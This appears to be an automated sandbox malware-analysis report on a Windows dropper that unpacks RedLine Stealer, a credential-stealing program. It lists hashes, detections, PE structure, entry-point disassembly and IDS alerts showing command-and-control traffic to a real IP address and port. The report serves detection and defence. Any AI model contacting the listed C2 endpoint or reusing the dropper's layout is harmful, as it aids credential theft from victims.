                                                                                                                                                                                                        SHA-256:99B41D21DF3CD6680366E6284BB21214152BF2D0C78DE9CECEA9C55DDDC61101
                                                                                                                                                                                                        SHA-512:FC41C8C88F0C098AB123121D9F0E51F3B8943A4A46F3077D60B7289BD8771CBE4E1680D1A047ECF3FE8E1801C8FEF0E8E356C08DBB915D1ED30939E5EC44DE6B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Cultu
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2843
                                                                                                                                                                                                        Entropy (8bit):5.3371553026862095
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHKAHK1HJ:iqXeqm00YqhQnouOqLqdqNq2qzcGtIxi
                                                                                                                                                                                                        MD5:F10BB43F50AF46B4AFC5C912ABFD63BB
                                                                                                                                                                                                        SHA1:8373E381D926D1023F0F50DE0D29BF8D2027DFDB
                                                                                                                                                                                                        SHA-256:CD9D9A3F7C491DF9BC3C712F9744D73EF40EC517C5223CF39CC10E11E9935720
                                                                                                                                                                                                        SHA-512:D9D04AB860934503D9E890BF8E7527F5B70D202F2371D7BF441FA82FF79CC5A1479A15DBE5C4BA1F52E81C4B7793EDE18E16195407D430BECBDA7E3611AE6958
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\W7ANVukbbj.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):382976
                                                                                                                                                                                                        Entropy (8bit):6.621520064198725
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:G4IyLNAYPyKfsog4gYW9aBKmMagGTFq3W:G5yZAIDEog4FW8gwFq
                                                                                                                                                                                                        MD5:8B79F6A1B67F97CA971CEF540ABF22E7
                                                                                                                                                                                                        SHA1:DB4260EEAB386F0E2414D3605F7424F5AC7E39E7
                                                                                                                                                                                                        SHA-256:F10032D8E8F46511F815FE1AA9B94C8D72D3923E0768E426A513B55CEA07E8E6
                                                                                                                                                                                                        SHA-512:CF584AB63F2089AA2F72C279077A6BDA456771D2C38A24C985BAE0CA33059AF4C5CFDE25441AD1DDA814CF6A9E186F8BC14335D6C5278B1350E674D8F4BE4F67
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 64%
                                                                                                                                                                                                        Joe Sandbox View:
• Filename: O3m4OQha7t.exe, Detection: malicious
• Filename: 9sqZDwVLWx.exe, Detection: malicious
• Filename: sPgGBA7Yuf.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\W7ANVukbbj.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):179317
                                                                                                                                                                                                        Entropy (8bit):4.9493538664698775
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:axqZWXragQx+//Lb/a4de0U9Uha/xNn2pU9f2MKTV/wi4lr55R9TxlnsPsUw0jOr:IqZW/Lb/xqUh
                                                                                                                                                                                                        MD5:763CFA2A099AC8748401DF32FF369ACE
                                                                                                                                                                                                        SHA1:04842B33306B15505A913002A45E4F3E2525A244
                                                                                                                                                                                                        SHA-256:BA0CBEEDCF95B82673048964A69AA10A1D1CFF49E64077D40278C3F7232DB054
                                                                                                                                                                                                        SHA-512:5D292F63E99FB1BFBE01E4986133CFF76939D8E3AB02686BC25E84B0CEB173B6692C2EFFCFF42CBEC8D1951BC0F97AAF8E3E772F417CE753175C47A56FA82E3F
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe, Author: Joe Security
                                                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe, Author: ditekSHen
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 77%
                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Entropy (8bit):7.754380762458114
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                        File name:W7ANVukbbj.exe
                                                                                                                                                                                                        File size:450560
                                                                                                                                                                                                        MD5:093a149ea955420c85d54127e964879a
                                                                                                                                                                                                        SHA1:ecef28b8b5ed66fc1226fc0c9e2ce98b89523e76
                                                                                                                                                                                                        SHA256:fd7f4611b78c0f0b264159fcc744604e1a089f9faa381c8e4414a123ff568d19
                                                                                                                                                                                                        SHA512:014a5e43692b423a14cf5c3c53ba1378d3d642b6da52e8c90d7dfd9a526df6c1cc84bb257a6ae05abba917c44ae785420784c906eccd2d12c5641ddce247bffe
                                                                                                                                                                                                        SSDEEP:6144:Kuy+bnr+2p0yN90QEsETKwHHhtW5OSD7N75zZwKWFaBKmMDgGTgBvwXQ0K0980q8:2Mr+y90oQBtgHjNW9gwkvQ38LvlYzN
                                                                                                                                                                                                        TLSH:D4A40107F6FC8132D4B457B01CF202C31A36BDA05A7892D7628FBC5718726B5A23276B
                                                                                                                                                                                                        Icon Hash:f8e0e4e8ecccc870
                                                                                                                                                                                                        Entrypoint:0x406a60
                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                        Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                        OS Version Major:10
                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                        File Version Major:10
                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                        Subsystem Version Major:10
                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                        Import Hash:646167cce332c1c252cdcb1839e0cf48
                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                        call 00007FEC30B49A25h
                                                                                                                                                                                                        jmp 00007FEC30B49335h
                                                                                                                                                                                                        push 00000058h
                                                                                                                                                                                                        push 004072B8h
                                                                                                                                                                                                        call 00007FEC30B49AC7h
                                                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                                                        mov dword ptr [ebp-20h], ebx
                                                                                                                                                                                                        lea eax, dword ptr [ebp-68h]
                                                                                                                                                                                                        push eax
                                                                                                                                                                                                        call dword ptr [0040A184h]
                                                                                                                                                                                                        mov dword ptr [ebp-04h], ebx
                                                                                                                                                                                                        mov eax, dword ptr fs:[00000018h]
                                                                                                                                                                                                        mov esi, dword ptr [eax+04h]
                                                                                                                                                                                                        mov edi, ebx
                                                                                                                                                                                                        mov edx, 004088ACh
                                                                                                                                                                                                        mov ecx, esi
                                                                                                                                                                                                        xor eax, eax
                                                                                                                                                                                                        lock cmpxchg dword ptr [edx], ecx
                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                        je 00007FEC30B4934Ah
                                                                                                                                                                                                        cmp eax, esi
                                                                                                                                                                                                        jne 00007FEC30B49339h
                                                                                                                                                                                                        xor esi, esi
                                                                                                                                                                                                        inc esi
                                                                                                                                                                                                        mov edi, esi
                                                                                                                                                                                                        jmp 00007FEC30B49342h
                                                                                                                                                                                                        push 000003E8h
                                                                                                                                                                                                        call dword ptr [0040A188h]
                                                                                                                                                                                                        jmp 00007FEC30B49309h
                                                                                                                                                                                                        xor esi, esi
                                                                                                                                                                                                        inc esi
                                                                                                                                                                                                        cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                        jne 00007FEC30B4933Ch
                                                                                                                                                                                                        push 0000001Fh
                                                                                                                                                                                                        call 00007FEC30B4985Bh
                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                        jmp 00007FEC30B4936Ch
                                                                                                                                                                                                        cmp dword ptr [004088B0h], ebx
                                                                                                                                                                                                        jne 00007FEC30B4935Eh
                                                                                                                                                                                                        mov dword ptr [004088B0h], esi
                                                                                                                                                                                                        push 004010C4h
                                                                                                                                                                                                        push 004010B8h
                                                                                                                                                                                                        call 00007FEC30B49486h
                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                        je 00007FEC30B49349h
                                                                                                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                        mov eax, 000000FFh
                                                                                                                                                                                                        jmp 00007FEC30B49469h
                                                                                                                                                                                                        mov dword ptr [004081E4h], esi
                                                                                                                                                                                                        cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                        jne 00007FEC30B4934Dh
                                                                                                                                                                                                        push 004010B4h
                                                                                                                                                                                                        push 004010ACh
                                                                                                                                                                                                        call 00007FEC30B49A15h
                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                        mov dword ptr [000088B0h], 00000000h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa28c | 0xb4 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x659a8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0x888 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1410 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1008 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xa000 | 0x288 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6314 | 0x6400 | False | 0.5744140625 | data | 6.314163792045976 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x8000 | 0x1a48 | 0x200 | False | 0.609375 | data | 4.970639543960129 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xa000 | 0x1052 | 0x1200 | False | 0.4140625 | data | 5.025949912909207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x66000 | 0x65a00 | False | 0.9085802967404674 | data | 7.808620509312085 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x72000 | 0x888 | 0xa00 | False | 0.746484375 | data | 6.222637930812128 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
AVI | 0xcb30 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States
RT_ICON | 0xf94c | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States
RT_ICON | 0xffb4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States
RT_ICON | 0x1029c | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States
RT_ICON | 0x10484 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States
RT_ICON | 0x105ac | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States
RT_ICON | 0x11454 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States
RT_ICON | 0x11cfc | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States
RT_ICON | 0x123c4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States
RT_ICON | 0x1292c | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x20300 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States
RT_ICON | 0x228a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States
RT_ICON | 0x23950 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States
RT_ICON | 0x242d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States
RT_DIALOG | 0x24740 | 0x2f2 | data | English | United States
RT_DIALOG | 0x24a34 | 0x35c | data | Russian | Russia
RT_DIALOG | 0x24d90 | 0x1b0 | data | English | United States
RT_DIALOG | 0x24f40 | 0x1b4 | data | Russian | Russia
RT_DIALOG | 0x250f4 | 0x166 | data | English | United States
RT_DIALOG | 0x2525c | 0x168 | data | Russian | Russia
RT_DIALOG | 0x253c4 | 0x1c0 | data | English | United States
RT_DIALOG | 0x25584 | 0x1e0 | data | Russian | Russia
RT_DIALOG | 0x25764 | 0x130 | data | English | United States
RT_DIALOG | 0x25894 | 0x150 | data | Russian | Russia
RT_DIALOG | 0x259e4 | 0x120 | data | English | United States
RT_DIALOG | 0x25b04 | 0x122 | data | Russian | Russia
RT_STRING | 0x25c28 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States
RT_STRING | 0x25cb4 | 0x86 | Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0 | Russian | Russia
RT_STRING | 0x25d3c | 0x520 | data | English | United States
RT_STRING | 0x2625c | 0x52e | data | Russian | Russia
RT_STRING | 0x2678c | 0x5cc | data | English | United States
RT_STRING | 0x26d58 | 0x592 | data | Russian | Russia
RT_STRING | 0x272ec | 0x4b0 | data | English | United States
RT_STRING | 0x2779c | 0x4b2 | data | Russian | Russia
RT_STRING | 0x27c50 | 0x44a | data | English | United States
RT_STRING | 0x2809c | 0x43e | data | Russian | Russia
RT_STRING | 0x284dc | 0x3ce | data | English | United States
RT_STRING | 0x288ac | 0x2fc | data | Russian | Russia
RT_RCDATA | 0x28ba8 | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x28bb0 | 0x47cc2 | Microsoft Cabinet archive data, many, 294082 bytes, 2 files, at 0x2c +A "twl97yF91.exe" +A "uPD30tM82.exe", ID 2151, number 1, 18 datablocks, 0x1503 compression | English | United States
RT_RCDATA | 0x70874 | 0x4 | data | English | United States
RT_RCDATA | 0x70878 | 0x24 | data | English | United States
RT_RCDATA | 0x7089c | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x708a4 | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x708ac | 0x4 | data | English | United States
RT_RCDATA | 0x708b0 | 0xe | data | English | United States
RT_RCDATA | 0x708c0 | 0x4 | data | English | United States
RT_RCDATA | 0x708c4 | 0xe | data | English | United States
                                                                                                                                                                                                        RT_RCDATA0x708d40x4dataEnglishUnited States
                                                                                                                                                                                                        RT_RCDATA0x708d80x6dataEnglishUnited States
                                                                                                                                                                                                        RT_RCDATA0x708e00x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                        RT_RCDATA0x708e80x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                        RT_GROUP_ICON0x708f00xbcdataEnglishUnited States
                                                                                                                                                                                                        RT_VERSION0x709ac0x408dataEnglishUnited States
                                                                                                                                                                                                        RT_VERSION0x70db40x410dataRussianRussia
                                                                                                                                                                                                        RT_MANIFEST0x711c40x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
DLL | Import
ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
GDI32.dll | GetDeviceCaps
USER32.dll | SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
msvcrt.dll | _controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
COMCTL32.dll |
Cabinet.dll |
VERSION.dll | GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
Language of compilation system | Country where language is spoken | Map
English | United States |
Russian | Russia |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/27/23-09:31:19.481059 | TCP | 2043233 | ET TROJAN RedLine Stealer TCP CnC net.tcp Init | 49736 | 4123 | 192.168.2.3 | 193.233.20.23
02/27/23-09:31:37.882033 | TCP | 2043231 | ET TROJAN Redline Stealer TCP CnC Activity | 49736 | 4123 | 192.168.2.3 | 193.233.20.23
02/27/23-09:30:29.261461 | TCP | 2043233 | ET TROJAN RedLine Stealer TCP CnC net.tcp Init | 49699 | 4123 | 192.168.2.3 | 193.233.20.23
02/27/23-09:31:21.995610 | TCP | 2043234 | ET MALWARE Redline Stealer TCP CnC - Id1Response | 4123 | 49736 | 193.233.20.23 | 192.168.2.3
02/27/23-09:30:46.338879 | TCP | 2043231 | ET TROJAN Redline Stealer TCP CnC Activity | 49699 | 4123 | 192.168.2.3 | 193.233.20.23
02/27/23-09:30:34.424527 | TCP | 2043234 | ET MALWARE Redline Stealer TCP CnC - Id1Response | 4123 | 49699 | 193.233.20.23 | 192.168.2.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                        Feb 27, 2023 09:31:35.697151899 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:35.836565971 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:35.859450102 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.009665966 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.057981014 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.080349922 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.081332922 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.131738901 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.154635906 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.156091928 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.178980112 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.357662916 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.379848957 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.380387068 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.510029078 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.711627007 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.734822989 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.734865904 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.806591034 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.835944891 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.858872890 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.864465952 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.887478113 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.894176960 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.917124987 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.009783983 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.227041960 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.250790119 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.253142118 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.277036905 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.321152925 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.659293890 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.682101011 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.777072906 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.799846888 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.814235926 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.837686062 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.857275963 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.881268024 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.882033110 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.904980898 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.931268930 CET497364123192.168.2.3193.233.20.23

                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                        Start time:09:30:15
                                                                                                                                                                                                        Start date:27/02/2023
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\W7ANVukbbj.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\W7ANVukbbj.exe
                                                                                                                                                                                                        Imagebase:0x860000
                                                                                                                                                                                                        File size:450560 bytes
                                                                                                                                                                                                        MD5 hash:093A149EA955420C85D54127E964879A
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.254929355.0000000004A26000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                        Start time:09:30:16
                                                                                                                                                                                                        Start date:27/02/2023
